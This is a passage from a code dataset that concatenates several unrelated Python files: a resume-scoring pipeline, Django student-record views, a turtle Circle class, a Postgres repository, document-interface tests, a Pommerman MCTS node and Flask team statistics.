or Temp[1] == \"PDF\":\n try:\n Temp_pdf = [] \n with open(i,'rb') as pdf_file:\n \n read_pdf = PyPDF2.PdfFileReader(pdf_file,strict=False)\n # page = read_pdf.getPage(0)\n # page_content = page.extractText()\n # Resumes.append(Temp_pdf)\n\n number_of_pages = read_pdf.getNumPages()\n for page_number in range(number_of_pages): \n\n page = read_pdf.getPage(page_number)\n page_content = page.extractText()\n page_content = page_content.replace('\\n', ' ')\n # page_content.replace(\"\\r\", \"\")\n Temp_pdf = str(Temp_pdf) + str(page_content)\n # Temp_pdf.append(page_content)\n # print(Temp_pdf)\n resume_text = [Temp_pdf]\n Temp_pdf = ''\n \n except Exception as e: \n print(e)\n print(traceback.format_exc())\n \n elif Temp[1] == \"rtf\" or Temp[1] == \"Rtf\" or Temp[1] == \"RTF\":\n \n try:\n \n rtf_path = Path(i)\n with rtf_path.open() as source:\n docText = rtf_to_text(source.read())\n \n c = [docText]\n resume_text = c\n \n except Exception as e: print(e)\n \n elif Temp[1] == \"docx\" or Temp[1] == \"Docx\" or Temp[1] == \"DOCX\":\n try:\n a = textract.process(i)\n a = a.replace(b'\\n', b' ')\n a = a.replace(b'\\r', b' ')\n b = str(a)\n c = [b]\n resume_text = c\n except Exception as e: print(e)\n \n elif Temp[1] == \"txt\" or Temp[1] == \"Txt\" or Temp[1] == \"TXT\":\n try:\n f = open(i,'r')\n lines = f.readlines()\n a = \"\\n\".join(lines)\n c = [str(a)]\n resume_text = c\n f.close()\n except Exception as e: print(e) \n \n elif Temp[1] == \"ex\" or Temp[1] == \"Exe\" or Temp[1] == \"EXE\":\n print(\"This is EXE\" , i)\n pass\n\n temptext = str(resume_text).lower()\n tttt = str(resume_text).lower()\n \n \n try:\n if(skills.dndResume(temptext,must_have_skill)):\n continue\n try:\n tttt = summarize(tttt, word_count=100)\n except Exception:\n continue\n jd_rankDict = skills.JDkeywordMatch(jobfile+skillset, temptext, jd_weightage)\n \n badWords = skills.word_polarity(temptext)\n \n min_qual_score = skills.minQualificationScore(temptext,min_qual,min_qual_weightage)\n confidence = {}\n score = int((min_qual_score/min_qual_weightage)*100)\n confidence['confidence'] = score\n if score >= 60:\n confidence['min qual'] = 'Yes'\n elif score < 60 and score > 0:\n confidence['min qual'] = 'May Be'\n else:\n confidence['min qual'] = 'No'\n is_min_qual = confidence\n \n \n resume_skill_list = skills.skillSetListMatchedWithJD(temptext.lower(),jobfile+skillset,skill_weightage,programming_skill)\n experience = extract_exp.get_features(temptext)\n temp_applicantName = entity.extractPersonName(temptext)\n bool_jobTitleFound = entity.isJobTitleAvailable(job_title, temptext)\n temp_phone = entity.extract_phone_numbers(temptext)\n if(len(temp_phone) == 0):\n Resume_phoneNo_vector = not_found\n else:\n Resume_phoneNo_vector = list(set(temp_phone))\n temp_email = entity.extract_email_addresses(temptext)\n if(len(temp_email) == 0):\n Resume_email_vector = not_found\n else:\n Resume_email_vector = list(set(temp_email))\n \n \n Resume_exp_vector = extract_exp.get_exp_weightage(str(jd_exp),experience,exp_weightage)\n \n non_tech_Score = skills.NonTechnicalSkillScore(temptext,jobfile+skillset,non_tech_weightage)\n Resume_non_skill_list = skills.nonTechSkillSetListMatchedWithJD(temptext,jobfile+skillset,non_tech_Score,soft_skill)\n \n final_rating = jd_rankDict.get('rank')+resume_skill_list.get('rank')+non_tech_Score+extract_exp.get_exp_weightage(str(jd_exp),experience,exp_weightage)+min_qual_score\n \n res = ResultElement(jd_rankDict,j,experience,Resume_phoneNo_vector,Resume_email_vector,\n Resume_exp_vector,round(final_rating),resume_skill_list,\n Resume_non_skill_list,min_qual_score,is_min_qual,temp_applicantName,bool_jobTitleFound,badWords)\n flask_return.append(res)\n \n except Exception:\n print(traceback.format_exc())\n\n\ndef res(jobfile,skillset,jd_exp,min_qual, job_title,input_json,aws_path,must_have_skill, s3_resource, fs, bucket_name,soft_skill=\"\",programming_skill=\"\"):\n\n LIST_OF_FILES = []\n LIST_OF_FILES_PDF = []\n LIST_OF_FILES_DOC = []\n LIST_OF_FILES_DOCX = []\n s3 = boto3.resource('s3')\n root_path='temp/'\n jd_weightage = input_json[\"weightage\"][\"jd\"]\n skill_weightage = input_json[\"weightage\"][\"skill\"]\n min_qual_weightage = input_json[\"weightage\"][\"minimum_qualification\"]\n non_tech_weightage = input_json[\"weightage\"][\"soft_skill\"]\n \n exp_weightage = 0\n if (str(input_json[\"weightage\"][\"experience\"][\"required\"]).lower() == 'true'):\n exp_weightage = input_json[\"weightage\"][\"experience\"][\"allocation\"]\n \n resumePath = bucket_name+pathSeprator+aws_path+pathSeprator+'Upload-Resume'\n \n #print('length of resume list is ', len(resume_name_inS3))\n \n for file in fs.glob(resumePath+'/*.pdf'):\n LIST_OF_FILES_PDF.append(file)\n for file in fs.glob(resumePath+'/*.doc'):\n LIST_OF_FILES_DOC.append(file)\n for file in fs.glob(resumePath+'/*.docx'):\n LIST_OF_FILES_DOCX.append(file)\n for file in fs.glob(resumePath+'/*.rtf'):\n LIST_OF_FILES_DOCX.append(file)\n for file in fs.glob(resumePath+'/*.txt'):\n LIST_OF_FILES_DOCX.append(file) \n\n LIST_OF_FILES = LIST_OF_FILES_DOC + LIST_OF_FILES_DOCX + LIST_OF_FILES_PDF\n print(\"Resume File list size \",len(LIST_OF_FILES))\n \"\"\" here we are creating the directory under temp folder\"\"\"\n sub_dir = aws_path.split(pathSeprator)[0]\n final_path = root_path+sub_dir+strftime(\"%H%M%S\", gmtime())\n if not os.path.exists(final_path):\n os.makedirs(final_path)\n print(\"directory created\",final_path)\n \n print(\"Resume download process starts\")\n dask.config.set(scheduler='threads', num_workers=20)\n _download = partial(_s3_download, s3,bucket_name)\n delayed_futures = [] \n for count,i in enumerate(LIST_OF_FILES):\n i = i.replace(bucket_name+pathSeprator, \"\")\n head, fileName = os.path.split(i)\n path_to_read_file = final_path+pathSeprator+fileName\n delayed_futures.append(dask.delayed(_download)(path_to_read_file,i))\n with ProgressBar():\n dask.compute(*delayed_futures) \n\n flask_return = []\n \n n_threads = 5\n inputFileSize = len(LIST_OF_FILES)\n if inputFileSize == 1 or inputFileSize == 2:\n n_threads=1\n elif inputFileSize == 3 or inputFileSize == 4 or inputFileSize == 5:\n n_threads=2\n \n array_chunk = np.array_split(LIST_OF_FILES, n_threads)\n procs = []\n print(\"Resume processing started...\")\n with Manager() as manager:\n flask_return = manager.list()\n for thr in range(n_threads):\n # print(name)\n proc = Process(target=threaded_process, args=(array_chunk[thr],final_path,jobfile,skillset,min_qual,jd_exp,resumePath,flask_return,must_have_skill,job_title,jd_weightage,skill_weightage,min_qual_weightage,non_tech_weightage,exp_weightage,soft_skill,programming_skill))\n procs.append(proc)\n proc.start()\n \n for proc in procs:\n proc.join()\n \n flask_return = list(flask_return)\n try:\n shutil.rmtree(final_path, ignore_errors=True)\n except:\n print(\"unable to delete directory \",final_path)\n\n return flask_return","sub_path":"jsoncore.py","file_name":"jsoncore.py","file_ext":"py","file_size_in_byte":11056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"38732379","text":"from django.shortcuts import render, get_object_or_404, redirect\r\nfrom django.http import HttpResponse, HttpResponseRedirect\r\nfrom App.forms import NewStudentForm, StudentUpdateForm\r\nfrom App.models import Student\r\nfrom django.urls import reverse\r\nfrom django.contrib import messages\r\nfrom django.contrib.auth.decorators import login_required\r\n\r\n# our homepage.\r\ndef index(request):\r\n context = {\"user\": request.user, \"state\": True}\r\n return render(request, \"App/index.html\", context)\r\n\r\n\r\n# get all student records.\r\n@login_required\r\ndef all_students(request):\r\n if request.method == \"GET\":\r\n students = Student.objects.all()\r\n if students:\r\n context = {\"data\": students, \"state\": False}\r\n return render(request, \"App/allStudents.html\", context)\r\n else:\r\n context = {\"message\": \"No student records found\", \"option\": \"add\"}\r\n return render(request, \"App/404.html\", context)\r\n else:\r\n context = {\"message\": \"POST is not allowed!\"}\r\n return render(request, \"App/404.html\", context)\r\n\r\n\r\n# adds a new student record to the database.\r\n@login_required\r\ndef add_student(request):\r\n if request.method == \"POST\":\r\n student_form = NewStudentForm(request.POST)\r\n if student_form.is_valid():\r\n cd = student_form.cleaned_data\r\n # std = get_object_or_404(Student,Registration=cd['Registration'])\r\n if Student.objects.filter(Registration=cd[\"Registration\"]).exists():\r\n\r\n # get the instance to send to error page\r\n student = Student.objects.get(Registration=cd[\"Registration\"])\r\n\r\n context = {\"message\": \"Student already exists!\", \"data\": student}\r\n return render(request, \"App/404.html\", context)\r\n else:\r\n student_form.save()\r\n student_data = Student.objects.get(Registration=cd[\"Registration\"])\r\n # print(\r\n # \"{} : {}\".format(student_data.FirstName, student_data.Registration)\r\n # )\r\n context = {\"data\": student_data}\r\n return render(request, \"App/studentDetails.html\", context)\r\n else:\r\n context = {\"message\": \"Invalid form! Try to add again.\"}\r\n return render(request, \"App/404.html\", context)\r\n else:\r\n return HttpResponse(\"GET is not allowed!\")\r\n\r\n\r\n# updates our student records.\r\n@login_required\r\ndef update_student(request, slug):\r\n if request.method == \"POST\":\r\n student_update_form = StudentUpdateForm(request.POST)\r\n if student_update_form.is_valid():\r\n cd = student_update_form.cleaned_data\r\n Student.objects.filter(slug=slug).update(\r\n FirstName=cd[\"FirstName\"],\r\n SecondName=cd[\"SecondName\"],\r\n Registration=cd[\"Registration\"],\r\n Hostel=cd[\"Hostel\"],\r\n LaptopSerialNumber=cd[\"LaptopSerialNumber\"],\r\n ) \r\n # send message to front-end using dajngo messages frmaework.\r\n messages.info(request, \"{} {} updated successfully!\".format(cd[\"FirstName\"],cd[\"SecondName\"]))\r\n return redirect(\"index\")\r\n\r\n else:\r\n context = {\"message\": \"Form submitted is invalid\"}\r\n return render(request, \"App/404.html\", context)\r\n else:\r\n context = {\"message\": \"GET is not allowed!\"}\r\n return render(request, \"App/404.html\", context)\r\n\r\n\r\n# deletes student instance.\r\n@login_required\r\ndef delete_student(request, reg):\r\n student = Student.objects.get(slug=reg)\r\n student.delete()\r\n messages.info(request, \"{} deleted successfully!\".format(student.FirstName))\r\n return redirect(\"index\")\r\n\r\n\r\n# searches databases for student with unipue slug.\r\n@login_required\r\ndef search_student(request, reg):\r\n if request.method == \"GET\":\r\n try:\r\n student = Student.objects.get(slug__exact=reg)\r\n if student:\r\n context = {\"data\": student, \"state\": False}\r\n return render(request, \"App/studentDetails.html\", context)\r\n except:\r\n context = {\"message\": \"Student not found\"}\r\n return render(request, \"App/404.html\", context)\r\n else:\r\n context = {\"message\": \"POST is not allowed!\"}\r\n return render(request, \"App/404.html\", context)\r\n\r\n","sub_path":"HGMS/App/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"76260081","text":"\n\nfrom xai.brain.wordbase.verbs._complain import _COMPLAIN\n\n#calss header\nclass _COMPLAINING(_COMPLAIN, ):\n\tdef __init__(self,): \n\t\t_COMPLAIN.__init__(self)\n\t\tself.name = \"COMPLAINING\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"complain\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_complaining.py","file_name":"_complaining.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"381855715","text":"\"\"\"\nCircle class that represents circle objects and handles exceptions\nCreated Spring 2019\nHomework 10\n@author: Ethan Walters (emw45)\n\"\"\"\n\nimport sys\nimport math\nimport turtle\n\n\nclass Circle:\n \"\"\"Initialize the Circle class constructor\"\"\"\n def __init__(self, x=0, y=0, radius=100, color='black', filled=False, window=turtle.Screen(),\n pen=turtle.Turtle()):\n if radius > 0:\n self.x = x\n self.y = y\n self.center = (x, y)\n self.radius = radius\n self.color = color\n self.filled = filled\n self.window = window\n self.pen = pen\n else:\n raise ValueError\n\n def __str__(self):\n \"\"\"Create a string method to print the Circle's current state and values\"\"\"\n\n return 'X Position: %s\\nY Position: %s\\nCenter Position: %s\\nRadius: %s' \\\n '\\nColor: %s\\nFilled: %s\\nArea: %s\\nCircumference: %s'\\\n % (self.x, self.y, self.center, self.radius, self.color, self.filled, self.get_area(),\n self.get_circumference())\n\n def get_area(self):\n \"\"\"Create an accessor method to get the area of the circle\"\"\"\n\n return round(math.pi * self.radius ** 2, 2)\n\n def get_circumference(self):\n \"\"\"Create an accessor method to get the circumference of the circle\"\"\"\n\n return round(2 * math.pi * self.radius, 2)\n\n def modify_radius(self, delta):\n \"\"\"Create a mutator method set the circle radius\"\"\"\n\n self.radius = delta\n\n def overlaps(self):\n \"\"\"Create a method to define which circles overlap\"\"\"\n\n distance = math.sqrt((self.x - self.x1) ** 2 + (self.y - self.y1) ** 2)\n radius1 = 130\n radii_sum = self.radius + radius1\n if distance < radii_sum:\n return True\n else:\n return False\n\n def render(self):\n \"\"\"Create a render method to draw the circle\"\"\"\n\n self.pen.hideturtle()\n self.pen.penup()\n self.pen.goto(self.center)\n self.pen.pendown()\n self.pen.circle(self.radius)\n self.window.exitonclick()\n\n\nif __name__ == '__main__':\n try:\n # Circle with sufficient values (positive radius)\n c1 = Circle(56, 34, 67, 'orange', False)\n c1.render()\n # Circle with insufficient values (negative radius)\n c2 = Circle(34, 67, -35, 'red', True)\n c2.render()\n except ValueError:\n print('Radius of circle must be greater than 0')\n sys.exit(-1)\n","sub_path":"homework10/circle.py","file_name":"circle.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"402203527","text":"import psycopg2, os, psycopg2.pool, psycopg2.extras, time\n\nclass Repo(object):\n pool = psycopg2.pool.ThreadedConnectionPool(5, 20, os.environ.get(\"DATABASE_URL\"))\n\n @classmethod\n def insert(klass, replay):\n conn = klass.pool.getconn()\n cursor = conn.cursor()\n\n query = \"INSERT INTO replays (id, url, version, map, played_at, players) values (%s, %s, %s, %s, %s, %s)\"\n arguments = [\n replay.id(),\n replay.url,\n replay.version(),\n replay.map,\n time.strftime(\"%a, %d %b %Y %H:%M:%S +0000\", replay.played_at),\n psycopg2.extras.Json(map(lambda player: player.to_dict(), replay.players))\n ]\n\n cursor.execute(query, arguments)\n conn.commit()\n\n klass.pool.putconn(conn)\n\n return replay\n\n @classmethod\n def one(klass, query, args):\n conn = klass.pool.getconn()\n cursor = conn.cursor()\n cursor.execute(query, args)\n\n result = cursor.fetchone()\n\n klass.pool.putconn(conn)\n\n return result\n","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"105863516","text":"from zhak_projects.interface_request.safety_inspection import doc_wsmc_wszl_modulename\nfrom zhak_projects.interface_request.safety_inspection.document_interfaces import documents_controller\nfrom zhak_projects.interface_request.safety_inspection.document_interfaces.documents_models import all_documents_models\nfrom zhak_projects.interface_request.safety_inspection.interface_exception_print import myprint\n\n\ndef interface_test_documents_list():\n \"\"\"\n 测试 文书的 list\n \"\"\"\n exceptions_module_name = []\n documents_controller.pageSize = 1\n for doc in all_documents_models():\n print(doc.controller_name)\n try:\n content = documents_controller.list(doc.controller_name)\n myprint(content)\n except:\n exceptions_module_name.append(doc.controller_name)\n print(\"error_documents\", exceptions_module_name)\n\n\n# content = generate_documents_template.list(\"docRegistCaseAudit\")\n# print(json.dumps(content, ensure_ascii=False, sort_keys=True, indent=4, separators=(', ', ': ')))\n\n\ndef interface_test_random_exportPdf():\n exceptions_module_name = []\n exceptions_module_pdfs = []\n type_code = []\n \"\"\"\n 随机抽取个guid\n \"\"\"\n documents_controller.pageSize = 1\n content = None\n for doc in all_documents_models():\n print(doc.controller_name)\n if doc.controller_name == \"doc\":\n try:\n content = documents_controller.list(\"securityCase\")\n except:\n exceptions_module_name.append(doc.controller_name)\n\n else:\n try:\n content = documents_controller.list(doc.controller_name)\n except:\n exceptions_module_name.append(doc.controller_name)\n \"\"\"\n pdf查找\n \"\"\"\n if content:\n if content[\"data\"][\"items\"]:\n guid = content[\"data\"][\"items\"][0][\"guid\"]\n try:\n print(guid)\n content = documents_controller.exportPdf(doc.controller_name, guid, doc.interfaces.export_pdf,\n doc.interfaces.pdf_type)\n myprint(content)\n if content:\n if content[\"code\"] == 500:\n type_code.append(doc.controller_name)\n except:\n exceptions_module_pdfs.append(doc.controller_name)\n print(\"\\033[1;31m error {} \\033[0m\".format(doc.controller_name))\n\n else:\n print(\"\\033[1;36m error {} \\033[0m\".format(\"Item Empty\"))\n\n print(\"error_documents\", exceptions_module_name)\n print(\"error_documents_pdf\", exceptions_module_pdfs)\n print(\"error_documents_pdf\", type_code)\n\n\ninterface_test_random_exportPdf()\n# interface_test_documents_list()\n","sub_path":"zhak_projects/interface_request/safety_inspection/document_interfaces/interface_test_main.py","file_name":"interface_test_main.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"570663179","text":"import copy\nimport random\n\nfrom pommerman.constants import Action\nfrom pommerman.agents import DummyAgent\nfrom pommerman.forward_model import ForwardModel\nfrom pommerman import constants\nfrom pommerman import characters\nfrom pommerman.constants import Item, POSSIBLE_ACTIONS\n\nfrom .mcts import MCTSNode\nfrom .group05_utils import bomb_can_destroy_a_wooden_wall\n\nACCESSIBLE_TILES = [Item.Passage.value, Item.Kick.value, Item.IncrRange.value, Item.ExtraBomb.value]\n\n\nclass Node(MCTSNode):\n def __init__(self, state, agent_id):\n self.total_reward = 0\n self.visit_count = 0\n # state is a list of: 0. Board, 1. Agents, 2. Bombs, 3. Items, 4. Flames\n self.state = state\n self.agent_id = agent_id\n\n # here we need to think about pruning (for a particular node)\n # which action combinations do we really want to investigate in our search tree?\n self.action_combinations = [(a1, a2) for a1 in POSSIBLE_ACTIONS for a2 in POSSIBLE_ACTIONS\n if not self.prune((a1, a2))]\n self.children = dict()\n\n def prune(self, actions):\n # TODO: here you can think about more complex stategies to prune moves,\n # which allows you to create deeper search trees (very important!)\n # remember: two agents -> ids: 0 and 1\n own_agent = self.state[1][self.agent_id]\n opponent_agent = self.state[1][1 - self.agent_id]\n own_position = own_agent.position\n opponent_position = opponent_agent.position\n own_action = actions[self.agent_id]\n opponent_action = actions[opponent_agent.agent_id]\n\n # a lot of moves (e.g. bumping into a wall or wooden tile) actually result in stop moves\n # we do not have to consider, since they lead to the same result as actually playing a stop move\n if not self._is_legal_action(own_agent, own_position, own_action) or not self._is_legal_action(opponent_agent, opponent_position, opponent_action):\n return True # prune action\n\n man_dist = manhattan_dist(own_position, opponent_position)\n if man_dist > 6 and opponent_action != Action.Stop.value:\n # we do not model the opponent, if it is more than 6 steps away\n return True\n\n ## own extension\n #if own_action == Action.Bomb.value:\n # if not bomb_can_destroy_a_wooden_wall(own_position, ):\n # return True\n\n return False\n\n\n def _is_legal_action(self, agent, position, action):\n \"\"\" prune moves that lead to stop move\"\"\"\n if action == Action.Stop.value:\n return True\n board = self.state[0]\n bombs = self.state[2]\n bombs = [bomb.position for bomb in bombs]\n row = position[0]\n col = position[1]\n if action == Action.Bomb.value:\n #print(\"agent.agent_id=\", agent.agent_id, \"agent.blast_strength=\", agent.blast_strength)\n ## if ammo is 0 you cannot lay bombs\n if agent.ammo == 0:\n return False\n # if it a bomb move, check if there is already a bomb planted on this field\n if (row, col) in bombs:\n return False\n bomb_can_destroy_a_wooden_wall(board, position, agent.blast_strength)\n\n if action == Action.Up.value:\n row -= 1\n elif action == Action.Down.value:\n row += 1\n elif action == Action.Left.value:\n col -= 1\n elif action == Action.Right.value:\n col += 1\n\n if row < 0 or row >= len(board) or col < 0 or col >= len(board):\n return False\n\n if board[row, col] in [Item.Wood.value, Item.Rigid.value]:\n return False\n\n # own adding that agent cannot go on boms when he cant kick, or when he can kick, but bomb is at a wall\n if board[row, col] == Item.Bomb.value:\n if not agent.can_kick:\n return False\n else:\n # if bomb lays on a wall or at the outer border we cannot cick it\n if action == Action.Up.value and (row == 0 or board[row-1, col] in [Item.Wood.value, Item.Rigid.value]): #TODO maybe add enemy here because we cant kick if enemy standst there?\n return False\n elif action == Action.Down.value and (row == len(board)-1 or board[row+1, col] in [Item.Wood.value, Item.Rigid.value]):\n return False\n elif action == Action.Left.value and (col == 0 or board[row, col-1] in [Item.Wood.value, Item.Rigid.value]):\n return False\n elif action == Action.Right.value and (col == len(board)-1 or board[row, col+1] in [Item.Wood.value, Item.Rigid.value]):\n return False\n\n return True\n\n def find_children(self):\n \"\"\" expands all children \"\"\"\n for actions in self.action_combinations:\n if actions not in self.children.keys():\n self.children[actions] = self._forward(actions)\n\n def _forward(self, actions):\n \"\"\" applies the actions to obtain the next game state \"\"\"\n # since the forward model directly modifies the parameters, we have to provide copies\n board = copy.deepcopy(self.state[0])\n agents = _copy_agents(self.state[1])\n bombs = _copy_bombs(self.state[2])\n items = copy.deepcopy(self.state[3])\n flames = _copy_flames(self.state[4])\n board, curr_agents, curr_bombs, curr_items, curr_flames = ForwardModel.step(\n actions,\n board,\n agents,\n bombs,\n items,\n flames\n )\n return Node([board, curr_agents, curr_bombs, curr_items, curr_flames], self.agent_id)\n\n def find_random_child(self):\n \"\"\" returns a random child, expands the child if it was not already done \"\"\"\n actions = random.choice(self.action_combinations)\n if actions in self.children.keys():\n return self.children[actions]\n else:\n child = self._forward(actions)\n return child\n\n def get_children(self):\n return self.children\n\n def get_unexplored(self):\n \"\"\" returns a randomly chosen unexplored action pair, or None \"\"\"\n unexplored_actions = [actions for actions in self.action_combinations if actions not in self.children.keys()]\n if not unexplored_actions:\n return None\n actions = random.choice(unexplored_actions)\n child = self._forward(actions)\n self.children[actions] = child\n return child\n\n def is_terminal(self):\n alive = [agent for agent in self.state[1] if agent.is_alive]\n return len(alive) != 2\n\n def get_total_reward(self):\n \"\"\" Returns Total reward of node (Q) \"\"\"\n return self.total_reward\n\n def incr_reward(self, reward):\n \"\"\" Update reward of node in backpropagation step of MCTS \"\"\"\n self.total_reward += reward\n\n def get_visit_count(self):\n \"\"\" Returns Total number of times visited this node (N) \"\"\"\n return self.visit_count\n\n def incr_visit_count(self):\n self.visit_count += 1\n\n def reward(self, root_state):\n # we do not want to role out games until the end,\n # since pommerman games can last for 800 steps, therefore we need to define a value function,\n # which assigns a numeric value to state (how \"desirable\" is the state?)\n return _value_func(self.state, root_state, self.agent_id)\n\n\ndef manhattan_dist(pos1, pos2):\n return abs(pos1[0] - pos2[0]) + abs(pos1[1] - pos2[1])\n\n\ndef _value_func(state, root_state, agent_id):\n # TODO: here you need to assign a value to a game state, for example the evaluation can\n # be based on the number of blasted clouds, the number of collected items the distance to the opponent, ...\n # an example how a numerical value can be derived:\n board = state[0]\n agents = state[1]\n own_agent = agents[agent_id]\n opponent_agent = agents[1-agent_id]\n root_own_agent = root_state[1][agent_id]\n assert own_agent, root_own_agent\n # check if own agent is dead\n if not own_agent.is_alive:\n return -1.0\n # check if opponent has been destroyed\n elif not opponent_agent.is_alive:\n return 1.0\n\n score = 0.0 # game is not over yet, we have to think about additional evaluation criteria\n\n own_position = own_agent.position\n opponent_position = opponent_agent.position\n\n # if agent cannot move in any direction than its locked up either by a bomb,\n # or the opponent agent -> very bad position\n down_cond = own_position[0] + 1 >= len(board) or \\\n board[own_position[0] + 1][own_position[1]] not in ACCESSIBLE_TILES\n up_cond = own_position[0] - 1 < 0 or \\\n board[own_position[0] - 1][own_position[1]] not in ACCESSIBLE_TILES\n right_cond = own_position[1] + 1 >= len(board) or \\\n board[own_position[0]][own_position[1] + 1] not in ACCESSIBLE_TILES\n left_cond = own_position[1] - 1 < 0 or \\\n board[own_position[0]][own_position[1] - 1] not in ACCESSIBLE_TILES\n\n if down_cond and up_cond and right_cond and left_cond:\n score += -0.5\n\n # we want to push our agent towards the opponent\n man_dist = manhattan_dist(own_position, opponent_position)\n score += 0.005*(10-man_dist) # the closer to the opponent the better\n\n # we want to collect items (forward model was modified to make this easier)\n score += own_agent.picked_up_items * 0.05\n\n # since search depth is limited, we need to reward well placed bombs instead\n # of only rewarding collecting items\n for bomb in state[2]:\n # we only reward bombs placed next to wood - you can improve this\n loc = bomb.position\n if loc[0]-1 >= 0 and board[loc[0]-1][loc[1]] == Item.Wood.value:\n score += 0.02\n if loc[0]+1 < len(board) and board[loc[0]+1][loc[1]] == Item.Wood.value:\n score += 0.02\n if loc[1]-1 >= 0 and board[loc[0]][loc[1]-1] == Item.Wood.value:\n score += 0.02\n if loc[1]+1 < len(board) and board[loc[0]][loc[1]+1] == Item.Wood.value:\n score += 0.02\n return score\n\n\ndef _copy_agents(agents_to_copy):\n \"\"\" copy agents of the current node \"\"\"\n agents_copy = []\n for agent in agents_to_copy:\n agt = DummyAgent()\n agt.init_agent(agent.agent_id, constants.GameType.FFA)\n agt.set_start_position(agent.position)\n agt.reset(\n ammo=agent.ammo,\n is_alive=agent.is_alive,\n blast_strength=agent.blast_strength,\n can_kick=agent.can_kick\n )\n agt.picked_up_items = agent.picked_up_items\n agents_copy.append(agt)\n return agents_copy\n\n\ndef _copy_bombs(bombs):\n \"\"\" copy bombs of the current node \"\"\"\n bombs_copy = []\n for bomb in bombs:\n bomber = characters.Bomber()\n bombs_copy.append(\n characters.Bomb(bomber, bomb.position, bomb.life, bomb.blast_strength,\n bomb.moving_direction)\n )\n\n return bombs_copy\n\n\ndef _copy_flames(flames):\n \"\"\" copy flames of the current node \"\"\"\n flames_copy = []\n for flame in flames:\n flames_copy.append(\n characters.Flame(flame.position, flame.life)\n )\n return flames_copy\n","sub_path":"student_agents/group05/group05/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":11307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"408269542","text":"'''\n@author: Dallas Fraser\n@author: 2016-04-12\n@organization: MLSB API\n@summary: The views for player stats\n'''\nfrom flask_restful import Resource, reqparse\nfrom flask import Response\nfrom json import dumps\nfrom api import DB\nfrom api.model import Team, Game\nfrom datetime import datetime, date, time\nfrom sqlalchemy import or_\nparser = reqparse.RequestParser()\nparser.add_argument('year', type=int)\nparser.add_argument('league_id', type=int)\nparser.add_argument('team_id', type=int)\n\n\ndef post(team_id, year, league_id):\n if team_id is not None:\n team = single_team(team_id)\n else:\n team = team_stats(year, league_id)\n return team\n\n\ndef single_team(team_id):\n team_query = Team.query.get(team_id)\n if team_query is None:\n return {}\n games = (DB.session.query(Game)\n .filter(or_(Game.away_team_id == team_id,\n Game.home_team_id == team_id)\n ).all())\n team = {team_id: {'wins': 0,\n 'losses': 0,\n 'games': 0,\n 'ties': 0,\n 'runs_for': 0,\n \"runs_against\": 0,\n 'hits_for': 0,\n 'hits_allowed': 0,\n 'name': str(team_query)}\n }\n for game in games:\n # loop through each game\n scores = game.summary()\n if game.away_team_id == team_id:\n score = scores['away_score']\n hits = scores['away_bats']\n opp = scores['home_score']\n opp_hits = scores['home_bats']\n else:\n score = scores['home_score']\n hits = scores['home_bats']\n opp = scores['away_score']\n opp_hits = scores['away_bats']\n if score > opp:\n team[team_id]['wins'] += 1\n elif score < opp:\n team[team_id]['losses'] += 1\n elif scores['home_bats'] + scores['away_bats'] > 0:\n team[team_id]['ties'] += 1\n team[team_id]['runs_for'] += score\n team[team_id]['runs_against'] += opp\n team[team_id]['hits_for'] += hits\n team[team_id]['hits_allowed'] += opp_hits\n team[team_id]['games'] += 1\n return team\n\n\ndef team_stats(year, league_id):\n t = time(0, 0)\n games = DB.session.query(Game)\n teams = DB.session.query(Team)\n if year is not None:\n d1 = date(year, 1, 1)\n d2 = date(year, 12, 30)\n start = datetime.combine(d1, t)\n end = datetime.combine(d2, t)\n games = games.filter(Game.date.between(start, end))\n teams = teams.filter(Team.year == year)\n if league_id is not None:\n games = games.filter(Game.league_id == league_id)\n teams = teams.filter(Team.league_id == league_id)\n result = {}\n for team in teams:\n # initialize each team\n result[team.id] = {'wins': 0,\n 'losses': 0,\n 'games': 0,\n 'ties': 0,\n 'runs_for': 0,\n \"runs_against\": 0,\n 'hits_for': 0,\n 'hits_allowed': 0,\n 'name': str(team)}\n for game in games:\n # loop through each game (max ~400 for a season)\n score = game.summary()\n result[game.away_team_id]['runs_for'] += score['away_score']\n result[game.away_team_id]['runs_against'] += score['home_score']\n result[game.away_team_id]['hits_for'] += score['away_bats']\n result[game.away_team_id]['hits_allowed'] += score['home_bats']\n result[game.home_team_id]['runs_for'] += score['home_score']\n result[game.home_team_id]['runs_against'] += score['away_score']\n result[game.home_team_id]['hits_for'] += score['home_bats']\n result[game.home_team_id]['hits_allowed'] += score['away_bats']\n if score['away_bats'] + score['home_bats'] > 0:\n result[game.away_team_id]['games'] += 1\n result[game.home_team_id]['games'] += 1\n if score['away_score'] > score['home_score']:\n result[game.away_team_id]['wins'] += 1\n result[game.home_team_id]['losses'] += 1\n elif score['away_score'] < score['home_score']:\n result[game.home_team_id]['wins'] += 1\n result[game.away_team_id]['losses'] += 1\n elif score['away_bats'] + score['home_bats'] > 0:\n result[game.home_team_id]['ties'] += 1\n result[game.away_team_id]['ties'] += 1\n return result\n\n\nclass TeamStatsAPI(Resource):\n def post(self):\n \"\"\"\n GET request for Team Stats List\n Route: Route['player_stats']\n Parameters:\n year: the year (int)\n team_id: the team id (int)\n league_id: the league id (int)\n Returns:\n status: 200\n mimetype: application/json\n data: list of Teams\n \"\"\"\n year = None\n args = parser.parse_args()\n if args['team_id']:\n tid = args['team_id']\n team = post(tid, None, None)\n else:\n if args['year']:\n year = args['year']\n else:\n year = None\n if args['league_id']:\n league_id = args['league_id']\n else:\n league_id = None\n team = post(None, year, league_id)\n return Response(dumps(team),\n 